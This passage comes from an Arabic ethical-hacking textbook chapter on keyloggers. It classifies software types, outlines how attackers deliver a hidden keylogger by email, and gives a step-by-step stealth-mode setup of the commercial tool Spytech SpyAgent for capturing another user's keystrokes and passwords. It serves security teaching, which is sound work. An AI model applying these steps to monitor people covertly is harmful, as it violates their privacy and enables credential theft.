‫اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻏﯾر ﻣطﻠوب اﻟوﺻول اﻟﻣﺎدي ﻣن ﺟﺎﻧب اﻟﺷﺧص ﻟﻠﺣﺻول ﻋﻠﻰ ﺑﯾﺎﻧﺎت اﻟﺿﻐطﺔ ﻷﻧﮫ ﯾﺗم اﻟﺣﺻول ﻋﻠﻰ اﻟﺑﯾﺎﻧﺎت ﻋﺑر اﻟﺑرﯾد‬
‫اﻻﻟﻛﺗروﻧﻲ ﻋﻠﻰ ﻓﺗرات ﻣﺣددة ﺳﻠﻔﺎ‪ Software Loggers .‬ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻟﺣﺻول ﻋﻠﻰ ﺑﯾﺎﻧﺎت إﺿﺎﻓﯾﺔ أﯾﺿﺎ‪،‬‬
‫ﺣﯾث أﻧﮭﺎ ﻻ ﺗﻘﺗﺻر ﻣن ﻗﺑل ﺗﺧﺻﯾص اﻟذاﻛرة اﻟﻣﺎدﯾﺔ ﻣﺛل ‪ .Hardware Loggers‬ﯾﺗم ﺗﺻﻧﯾف ‪ Software Loggers‬إﻟﻰ ﺳﺗﺔ أﻧواع‪.‬‬
‫وھم‪:‬‬
‫‪Application Keylogger‬‬
‫‪Kernel Keylogger‬‬
‫‪Rootkit Keylogger‬‬
‫‪Device Driver Keylogger‬‬
‫‪Hypervisor-based Keylogger‬‬
‫‪Form-Grabbing-Based Keylogger‬‬
‫‪Application Keylogger -‬‬
‫‪ Application Keylogger‬ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ ﻛل ﻣﺎ ﯾﻛﺗﺑﮫ اﻟﻣﺳﺗﺧدم ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬واﻟدردﺷﺔ‪ ،‬وﻏﯾرھﺎ ﻣن اﻟﺗطﺑﯾﻘﺎت‪ ،‬ﺑﻣﺎ‬
‫ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور‪ .‬ﻣﻊ ھذا ﯾﻣﻛﻧك ﺣﺗﻰ ﺗﺗﺑﻊ ﺳﺟﻼت ﻧﺷﺎط اﻹﻧﺗرﻧت‪ .‬ھو ﻏﯾر ﻣرﺋﻲ ﺗﻣﺎﻣﺎ ﻟﺗﺗﺑﻊ وﺗﺳﺟﯾل ﻛل ﻣﺎ ﯾﺣدث داﺧل اﻟﺷﺑﻛﺔ‬
‫ﺑﺄﻛﻣﻠﮭﺎ‪.‬‬
‫‪Kernel Keylogger -‬‬
‫ھذا اﻷﺳﻠوب ﻧﺎدرا ﻣﺎ ﯾﺳﺗﺧدم ﻷﻧﮫ ﻣن اﻟﺻﻌب أن ﯾﻛﺗب ﻛﻣﺎ ﯾﺗطﻠب ﻣﺳﺗوى ﻋﺎل ﻣن اﻟﻛﻔﺎءة ﻣن ﻣطور اﻟﻛﯾﻠوﺟرز‪ .‬ﻣن اﻟﺻﻌب أﯾﺿﺎ إﻋداده‪.‬‬
‫ﺗوﺟد ھذه اﻟﻛﯾﻠوﺟرز ﻋﻠﻰ ﻣﺳﺗوى اﻟﻧواة‪/‬اﻟﻛﯾرﻧل‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﮭو ﯾﺻﻌب اﻛﺗﺷﺎﻓﮫ‪ ،‬ﺧﺎﺻﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﺗطﺑﯾﻘﺎت وﺿﻊ اﻟﻣﺳﺗﺧدم‪ .‬ھذا اﻟﻧوع ﻣن‬
‫اﻟﻛﯾﻠوﺟرز ﯾﻌﻣل ﻣﺛل ﺑراﻣﺞ ﺗﺷﻐﯾل ﺟﮭﺎز ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﺗﺣﻘﻖ ﻣﻛﺎﺳب اﻟوﺻول إﻟﻰ ﺟﻣﯾﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﻛﺗوﺑﺔ ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪.‬‬
‫‪Rootkit Keylogger -‬‬
‫‪ Rootkit-based Keylogger‬ھو ﺑرﻧﺎﻣﺞ ﺗﺷﻐﯾل ﺟﮭﺎز وﯾﻧدوز ﻣزور اﻟذي ﯾﺳﺟل ﻛل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ھذا اﻟﻛﯾﻠوﺟرز ﯾﺧﻔﻲ ﻣن اﻟﻧظﺎم‬
‫وﻏﯾر ﻗﺎﺑل ﻟﻠﻛﺷف ﺣﺗﻰ ﻣﻊ اﻷدوات اﻟﻘﯾﺎﺳﯾﺔ أو اﻷدوات اﻟﻣﺗﺧﺻﺻﺔ‪.‬‬
‫‪Device Driver Keylogger -‬‬
‫ھذا اﻟﻧوع ﻣن اﻟﻛﯾﻠوﺟرز ﯾﻌﻣل ﻋﺎدة ك ‪ .Device Driver‬ھو ﯾﺣل ﻣﺣل ‪ I/O driver‬ﻣﻊ وظﯾﻔﺔ ال ‪ Keylogging‬اﻟﻣﺿﻣﻧﺔ‪ .‬ﯾﺗم ﺣﻔظ‬
‫ﻛﺎﻓﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ أﺟرﯾت ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻟﺗﺳﺟﯾل اﻟدﺧول ﻓﻲ ﻣﻠف ﻣﺧﻔﻲ وﻣن ﺛم ﯾﺗم إرﺳﺎﻟﮭﺎ إﻟﻰ اﻟوﺟﮭﺔ ﻣن ﺧﻼل ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ .‬ﯾﺗم إﺧﻔﺎء‬
‫ﻣﻠﻔﺎت اﻟﺳﺟل اﻟﺗﻲ ﯾﺗم إرﺳﺎﻟﮭﺎ إﻟﻰ اﻟوﺟﮭﺔ واﻟﺗﻲ ﻛﺗﺑت ﺑواﺳطﺔ اﻟﻛﯾﻠوﺟرز ھذا وأﻧﮭﺎ ﯾﺻﻌب ﺗﻣﯾزھﺎ ﻋن ﻣﻠﻔﺎت ﻧظﺎم اﻟﺗﺷﻐﯾل‪ ،‬ﺣﺗﻰ أﺛﻧﺎء‬
‫اﻟﻘﯾﺎم ﺑﺳرد اﻟﻣﻠﻔﺎت اﻟﻣﺧﻔﯾﺔ واﻟﻣﺟﻠدات‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪405‬‬

‫‪Hypervisor-based Keylogger -‬‬


‫ﺗم ﺑﻧﺎء )‪ (Hypervisor-based Keylogger‬ﺿﻣن ﺑرﻣﺟﯾﺎت ‪ Hypervisor‬اﻟﺧﺑﯾﺛﺔ اﻟﺗﻲ ﺗﻌﻣل ﺗﺣت ﻧظﺎم اﻟﺗﺷﻐﯾل وﻻ ﯾﻣﻛن أن ﯾﻧظر‬
‫إﻟﯾﮫ ﺟﺳدﯾﺎ أو ﻟﻣﺳﮭﺎ‪ .‬أﻧﮭﺎ ﻣﺛل أﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟوھﻣﯾﺔ)‪. (virtual machines‬‬
‫‪Form Grabber-Based Keylogger -‬‬
‫ﻓﻲ ‪ ،Form Grabber-Based Keylogger‬ﺣﯾث ﯾﺗم ﺗﺳﺟﯾل ﺑﯾﺎﻧﺎت ﻧﻣﺎذج اﻟوﯾب ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت أوﻻ ﺛم ﺑﻌد ﺗﻘدﯾﻣﮫ ﻋﺑر‬
‫اﻹﻧﺗرﻧت‪ ،‬ﻓﺈﻧﮫ ﯾﺗﺟﺎوز ﺗﺷﻔﯾر ‪ ،Form Grabber-Based Keylogger .HTTPS‬ﯾﻘوم ﺑﺗﺳﺟﯾل ﻣدﺧﻼت ﻧﻣوذج اﻟوﯾب ﻋن طرﯾﻖ‬
‫ﺗﺳﺟﯾل ﺗﺻﻔﺢ اﻟوﯾب اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ ﻧﻔس اﻟوظﯾﻔﺔ‪.‬‬

‫ﻣﻧﮭﺟﯾﺔ اﻟﮭﺎﻛرز ﻓﻲ اﺳﺗﺧدام ‪ Keyloggers‬ﻋن ﺑﻌد )‪(Methodology Of Attacker In Using Remote Keylogger‬‬
‫ﻟﻌرض اﻟﺑﯾﺎﻧﺎت ﻋن ﺑﻌد‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﻘوم أوﻻ ﺑﺈﻧﺷﺎء ﻣﻠف ﺗﻧﻔﯾذي ﺧﺑﯾث )‪ (malicious executable file‬وإرﺳﺎل ھذا اﻟﻣﻠف ﻟﻠﺿﺣﯾﺔ‬
‫ﻋن طرﯾﻖ اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ )أي إﺧﻔﺎء ﻣﻠف ﺿﺎر وراء ﻣﻠف ﺣﻘﯾﻘﻲ‪ ،‬ﻣﺛل ﺻورة أو أﻏﻧﯾﺔ(‪ ،‬أو ﻏﯾر ذﻟك ﻣن ﺧداع اﻟﻣﺳﺗﺧدم ﻟﺗﺣﻣﯾﻠﮫ ﻣن‬
‫ﻣوﻗﻊ ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﻧﺗرﻧت أو ﺧﺎدم اﻟﺧﺑﯾﺛﺔ‪ .‬ﺑﻣﺟرد أن ﯾﻧﻘر اﻟﺿﺣﯾﺔ ﻋﻠﻰ ھذا اﻟﻣﻠف اﻟﺧﺑﯾث‪ ،‬ﯾﺗم ﺗﺛﺑﯾت ﻛﻠوﻏر ﻋﻠﻰ اﻟﻧظﺎم واﻟﺿﺣﯾﺔ ﻻ ﯾﻌرف‬
‫أﻧﮫ ﺗم ﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ اﻟﻛﯾﻠوﺟرز ﻋﻠﻰ اﻟﻧظﺎم ﻛﻣﺎ أﻧﮫ أﯾﺿﺎ ﻏﯾر ﻣرﺋﻲ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﺿﺣﯾﺔ‪ Keylogger .‬ﯾﻘوم ﺑﺟﻣﻊ ﻛل ﺿﻐطﺔ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن‬
‫ﻗﺑل اﻟﻣﺳﺗﺧدم ﺳرا ﺛم ﯾﻘوم ﺑﺣﻔظﮭﺎ إﻟﻰ ﻣﻠف ﻧﺻﻲ أو ﻣﻠف اﻟﺳﺟل‪ .‬ﻗد ﯾﺣﺗوي ﻣﻠف اﻟﺳﺟل ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ ﻣﺛل أرﻗﺎم اﻟﺣﺳﺎﺑﺎت‬
‫اﻟﻣﺻرﻓﯾﺔ وﻛﻠﻣﺎت اﻟﺳر وأرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن وأرﻗﺎم اﻟﮭواﺗف واﻟﻌﻧﺎوﯾن واﻟﺦ‪ .‬ﺑﻣﺟرد ارﺗﺑﺎط اﻟﺿﺣﯾﺔ ﺑﺎﻹﻧﺗرﻧت‪ ،‬ﯾﺗم إرﺳﺎل ھذه اﻟﻣﻠﻔﺎت‬
‫إﻟﻰ ﻣوﻗﻊ ﺑﻌﯾد ﻛﻣﺎ ﺗم اﻋداده ﻣن ﻗﺑل اﻟﻣﮭﺎﺟم‪ .‬ھﻧﺎ اﻟﻣﮭﺎﺟم ﻻ ﯾﺣﺗﺎج إﻟﻰ اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪.‬‬

‫‪Acoustic/CAM Keyloggers‬‬

‫‪ Acoustic Keyloggers‬ﯾﻌﻣل ﻋﻠﻰ ﻣﺑدأ ﺗﺣوﯾل اﻟﻣوﺟﺎت اﻟﺻوﺗﯾﺔ إﻟﻰ ﺑﯾﺎﻧﺎت ﻛﮭروﻣﻐﻧﺎطﯾﺳﯾﺔ‪ .‬ھذا اﻟﻣﻔﮭوم ھو أن ﻛل ﻣﻔﺗﺎح ﻋﻠﻰ ﻟوﺣﺔ‬
‫اﻟﻣﻔﺎﺗﯾﺢ ﻟﮫ ﺻوت ﻣﺧﺗﻠف ﻗﻠﯾﻼ ﻋﻧد اﻟﺿﻐط ﻋﻠﯾﮫ‪ .‬ھﻧﺎك أﺟﮭزة ﺗﻧﺻت اﻟﺗﻲ ھﻲ ﻗﺎدرة ﻋﻠﻰ اﻟﻛﺷف ﻋن اﻻﺧﺗﻼﻓﺎت اﻟدﻗﯾﻘﺔ ﺑﯾن اﻷﺻوات ﻣﻊ‬
‫ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح واﺳﺗﺧدام ھذه اﻟﻣﻌﻠوﻣﺎت ﻟﺗﺳﺟﯾل ﻣﺎ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم‪.‬‬
‫‪ The acoustic Keylogger‬ﯾﺗطﻠب اﻟﻛﺛﯾر ﻣن اﻟﺗﻌﻠم "‪ "learning period‬أي ﺣواﻟﻰ ‪ 1،000‬أو أﻛﺛر ﻣن اﻟﺿﻐطﺎت ﻟﺗﺣوﯾل‬
‫اﻷﺻوات اﻟﻣﺳﺟﻠﺔ اﻟﻰ ﺑﯾﺎﻧﺎت‪ .‬ﯾﺗم ذﻟك ﻣن ﺧﻼل ﺗطﺑﯾﻖ ﺧوارزﻣﯾﺔ ﺗردد اﻷﺻوات اﻟﻣﺳﺟﻠﺔ‪ .‬ﻟﺗﺣدﯾد ﺗواﻓﻖ اﻟﺻوت ﻣﻊ أي ﻣﻔﺗﺎح‪ ،‬ﯾﺳﺗﺧدم‬
‫‪ acoustic Keylogger‬اﻟﺑﯾﺎﻧﺎت اﻹﺣﺻﺎﺋﯾﺔ ﻋﻠﻰ أﺳﺎس اﻟﺗردد اﻟذي ﯾﺳﺗﺧدم ﻣﻊ ﻛل ﻣﻔﺗﺎح ﻷﻧﮫ ﺳﯾﺗم اﺳﺗﺧدام ﺑﻌض اﻟﺣروف أﻛﺛر ﺑﻛﺛﯾر‬
‫ﻣن ﻏﯾرھﺎ‪.‬‬

‫‪ A CAM Keylogger‬ﯾﺟﻌل اﺳﺗﺧدام اﻟﻛﺎﻣﯾرا ﻟﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ﺣﯾث ﺗﻘوم اﻟﻛﺎﻣﯾرا اﻟﻣﺛﺑﺗﺔ ﺑﺄﺧذ ﻟﻘطﺎت ﻣن ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﺛم‬
‫ﺗﻘوم ﺑرﺻدھﺎ وﻣن ﺛم ارﺳﺎل ﺳﺟل اﻟﻠﻘطﺎت إﻟﻰ ﺣﺳﺎب اﻟﻣﮭﺎﺟم ﻋﻠﻰ ﻓﺗرات دورﯾﺔ‪ .‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﺳﺗرداد اﻟﻣﻌﻠوﻣﺎت ﻣن ﺧﻼل اﻟﺗﺣﻘﯾﻖ ﻣن‬
‫ﻟﻘطﺎت اﻟﺷﺎﺷﺔ اﻟﺗﻲ ﺗم إرﺳﺎﻟﮭﺎ ﻣن ﻗﺑل ‪.CAM Keylogger‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪406‬‬

‫‪Keyloggers‬‬
‫ﺑﺟﺎﻧب اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗﻣت ﻣﻧﺎﻗﺷﺗﮭﺎ ﺳﺎﺑﻘﺎ‪ ،acoustic/CAM Keyloggers ،‬ﻓﮭﻧﺎك ﻛﯾﻠوﺟرز أﺧرى ﺧﺎرﺟﯾﺔ واﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ‬
‫ﻟﻣراﻗﺑﺔ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻣن اﻟﻧظﺎم ﻟﺷﺧص ﻣﺎ‪ .‬ﯾﻣﻛن أن ﺗﻌﻠﻖ ھذه ﻛﯾﻠوﺟرز اﻟﺧﺎرﺟﯾﺔ ﺑﯾن ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﻌﺗﺎدة وﺟﮭﺎز ﻛﻣﺑﯾوﺗر‬
‫ﻟﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح‪.‬‬

‫ﯾﻣﻛﻧك اﺳﺗﺧدام أﺟﮭزة ﻛﯾﻠوﺟرز اﻟﺧﺎرﺟﯾﺔ اﻟﺗﺎﻟﯾﺔ ﻟﻣراﻗﺑﺔ ﻧﺷﺎط اﻟﻣﺳﺗﺧدم‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪407‬‬

‫‪Keylogger: Spytech SpyAgent‬‬


‫اﻟﻣﺻدر‪http://www.spytech-web.com :‬‬

‫‪ Spytech SpyAgent‬ھو ﺑرﻧﺎﻣﺞ ﻟﺗﺳﺟﯾل ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ واﻟذي ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻟﻠﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم اﻟذي ﺗم‬
‫اﻟﺗﺛﺑﯾت ﻋﻠﯾﮫ‪ .‬ﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ أن ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ اﻷﻣور اﻟﺗﺎﻟﯾﺔ ﻋﻠﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم‪:‬‬
‫‪ -‬ﯾﻛﺷف ﻋن اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪.‬‬
‫‪ -‬ﯾﺳﺟل ﺟﻣﯾﻊ ﻋﻣﻠﯾﺎت اﻟﺑﺣث اﻟﺗﻲ ﻧﻔذت ﻋﻠﻰ اﻻﻧﺗرﻧت‪.‬‬
‫‪ -‬ﻣراﻗﺑﺔ ﻣﺎ ھﻲ اﻟﺑراﻣﺞ واﻟﺗطﺑﯾﻘﺎت ﻗﯾد اﻻﺳﺗﺧدام‪.‬‬
‫‪ -‬ﯾﺳﺟل ﻛل اﺳﺗﺧدام اﻟﻣﻠﻔﺎت واﻟﻣﻌﻠوﻣﺎت اﻟطﺑﺎﻋﺔ‪.‬‬
‫‪ -‬ﯾﺳﺟل ﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت‪.‬‬
‫‪ -‬ﺑل ھو أﯾﺿﺎ ﻗﺎدرا ﻋﻠﻰ رؤﯾﺔ ﻛل اﻻﺗﺻﺎل ﻋﺑر اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم‪.‬‬
‫‪ -‬ﯾﺳﺎﻋد ﻋﻠﻰ ﺗﺣدﯾد ھل اﻟﻣﺳﺗﺧدم ﯾﻘوم ﺑﺎﻟﺗﺣﻣﯾل)‪ (downloading‬أو ﯾﻘوم ﺑﺎﻟرﻓﻊ )‪.(uploading‬‬
‫‪ -‬ﯾﻛﺷف ﻛﻠﻣﺎت اﻟﺳر ﻟﻠﻣﺳﺗﺧدم اﻟﺳرﯾﺔ‪.‬‬
‫ﯾﻣﻛﻧك ﺗﺣﻣﯾل ھذا اﻟﺑرﻧﺎﻣﺞ ﻣن اﻟﻣوﻗﻊ اﻟرﺳﻣﻲ ﻟﮫ وﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗرﯾد ﻣراﻗﺑﺗﮫ‪ ،‬وﺑﻌد ذﻟك ﻓﻘط اﻧﻘر ﻓوق ﺑدء اﻟرﺻد‪ .‬ھذا ﻛل‬
‫ﺷﻲء وﺳوف ﯾﺳﺟل ﻋدد ﻣن اﻻﻣور ﺑﺎﻟﻧﺳﺑﺔ ﻟك ﺣول ﻧﺷﺎط اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫‪ -1‬ﻧﺑدأ ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﻋن طرﯾﻖ إﺗﺑﺎع ‪ Wizard‬اﻟﺧﺎص ﺑﻌﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﺣﺗﻰ ﻧﺻل اﻟﻰ ھذه اﻟﻣرﺣﻠﺔ ﻣن ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت‪:‬‬

‫‪ -2‬ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﻣن ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﻧﺧﺗﺎر ‪ Administrator/Tester‬ﺛم ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪ Next‬ﺣﺗﻰ ﻧﺻل اﻟﻰ اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -3‬ﻧﻧﻘر ﻓوق ‪ Yes‬ﺛم ‪ Next‬ﺣﺗﻰ ﺗظﮭر اﺧر ﻣرﺣﻠﮫ وﻓﯾﮭﺎ ﻧﻧﻘر ﻓوق ‪ Close‬ﺣﺗﻰ ﻧﻧﺗﮭﻲ ﻣن ﻋﻣﻠﯾﮫ اﻟﺗﺛﺑﯾت ﺛم ﺗظﮭر ﺷﺎﺷﮫ اﻟﺗطﺑﯾﻖ‬
‫اﻷﺳﺎﺳﯾﺔ وﻧﻧﻘر ﻓوق ‪ continue‬ﺣﺗﻰ ﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ واﻟﺗﻲ ﺗطﻠب ادﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -4‬ﻣن ﺧﻼل ھذه اﻟﺷﺎﺷﺔ ﻧﻘوم ﺑﺈدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗرﯾدھﺎ ﺛم ﻧﻧﻘر ﻓوق ‪.OK‬‬
‫‪ -5‬ﺗظﮭر رﺳﺎﻟﺔ ﺗﺧﺑرك ﺑﻧﺟﺎح اﺳﺗﺧدام ﻛﻠﻣﺔ اﻟﻣرور ﺛم ﺑﻌد ذﻟك ﻧﻧﻘر ﻓوق ‪ Continue‬ﺣﺗﻰ ﺗظﮭر ﺷﺎﺷﺔ اﻻﻋداد اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪408‬‬

‫‪ -6‬ﻣن ﺧﻼل ھذه اﻟﺷﺎﺷﺔ ﻧﺧﺗﺎر ‪ Complete + Stealth Configuration‬ﺛم ﻧﻧﻘر ﻓوق ‪ Next‬ﺛم اﻟﻣرﺣﻠﺔ اﻟﺗﺎﻟﯾﺔ ﻣن ﻋﻣﻠﯾﺔ‬
‫اﻻﻋداد ﻧﺧﺗﺎر ﻣن ﻣﺟﻣوﻋﺔ ﺧﯾﺎرات اﺿﺎﻓﯾﮫ ‪ Display Alert at Startup‬ﺛم ﻧﻧﻘر ﻓوق ‪ Next‬ﺣﺗﻰ ﻧﺻل اﻟﻰ ﻣرﺣﻠﺔ ‪Finish‬‬
‫وﻧﻧﺗﮭﻲ ﻣن ﻋﻣﻠﯾﺔ اﻻﻋداد‪.‬‬
‫‪ -7‬ﺑﻌد اﻻﻧﺗﮭﺎء ﻣن ﻋﻣﻠﯾﺔ اﻻﻋداد واﻟﻧﻘر ﻓوق ‪ Finish‬ﺗظﮭر ﺷﺎﺷﮫ أﺧرى ﻧﻧﻘر ﻓوق ‪ Continue‬ﺣﺗﻰ ﺗظﮭر اﻟﺷﺎﺷﺔ اﻟرﺋﯾﺳﯾﺔ ﻟﻠﺗطﺑﯾﻖ‬
‫ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -8‬ﻟرؤﯾﺔ ﻧﺷﺎط اﻟﻣﺳﺗﺧدم اﻟﻌﺎﻣﺔ ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪.Start Monitoring‬‬


‫‪ -9‬واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور ﺷﺎﺷﮫ ﺗرﯾد ﻣﻧك إدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ﺑﻌد إدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور ﻧﻧﻘر ﻓوق ‪ Ok‬واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور‬
‫اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪409‬‬

‫‪ -10‬ھذه اﻟﺷﺎﺷﺔ ﺗﺧﺑرك اﻧﮫ ﻛﻠﻰ ﺗﻘوم ﺑﺎﻻﻧﺗﻘﺎل اﻟﻰ ‪ Stealth mode‬ﯾﻣﻛﻧك ذﻟك ﻣن ﺧﻼل اﻟﻧﻘر ﻓوق ‪.Ctrl+Shift+Alt+M‬‬
‫‪ -11‬ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪ ok‬ﻟﯾﺑدأ ﺑﻌﻣﻠﯾﺔ رﺻد ﻧﺷﺎط اﻟﺟﮭﺎز واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور رﺳﺎﻟﺔ ﻧﻧﻘر ﻓوق ‪.Continue‬‬
‫‪ -12‬اﻻن ﻗم ﺑﺗﺻﻔﺢ اﻻﻧﺗرﻧت‪ ،‬ﺛم ﺑﻌد ذﻟك ﻧﻘوم ﺑﺈﺣﺿﺎر ‪ Stealth mode‬ﻋن طرﯾﻖ اﻟﻧﻘر ﻓوق‪. Ctrl+Shift+Alt+M‬‬
‫‪ -13‬ﺗؤدى اﻟﻰ ظﮭور ﺷﺎﺷﮫ ﯾطﻠب ﻓﯾﮭﺎ ﻣﻧك ﻛﻠﻣﺔ اﻟﻣرور ﻧﻘوم ﺑﺈدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور ﺛم اﻟﻧﻘر ﻓوق ‪ .Ok‬ﺛم ﺑﻌد ذﻟك ﺗظﮭر ﺷﺎﺷﮫ اﻟﺗطﺑﯾﻖ‬
‫اﻟرﺋﯾﺳﯾﺔ‪.‬‬
‫‪ -14‬ﻟرؤﯾﺔ ﻣﺎ ﻗﺎم ﺑﮫ اﻟﻣﺳﺗﺧدم ﻣن اﻟﻧﻘر ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻧﻘوم ﺑﺎﺧﺗﯾﺎر ‪ Keystrokes Typed‬واﻟﺗﻲ ﺳوف ﯾﻌرض ﻣﺎ ﻗﺎم ﺑﮫ‬
‫اﻟﻣﺳﺗﺧدم ﻣن اﻟﻧﻘر ﻓوق ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪410‬‬

‫‪Keylogger: All in One Keylogger‬‬


‫اﻟﻣﺻدر‪http://www.relytec.com :‬‬
‫‪ All in One Keylogger‬ھو ﺑرﻧﺎﻣﺞ ﻛﻠوﻏر ﻣراﻗﺑﺔ ﻏﯾر ﻣرﺋﻲ واﻟذي ﯾﺳﻣﺢ ﻟك ﺑﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ وﻣراﻗﺑﺔ ﻛل ﻧﺷﺎط اﻟﻣﺳﺗﺧدم‬
‫ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﺎﻟﺗﺗﺑﻊ ﺳرا ﻟﺟﻣﯾﻊ اﻷﻧﺷطﺔ ﻣن ﺟﻣﯾﻊ ﻣﺳﺗﺧدﻣﻲ اﻟﻛﻣﺑﯾوﺗر وﯾﺗﻠﻘﻰ ﻣﻠﻔﺎت اﻟﺳﺟل ﺗﻠﻘﺎﺋﯾﺎ ﻟﻠﺣﺳﺎﺑﺎت‬
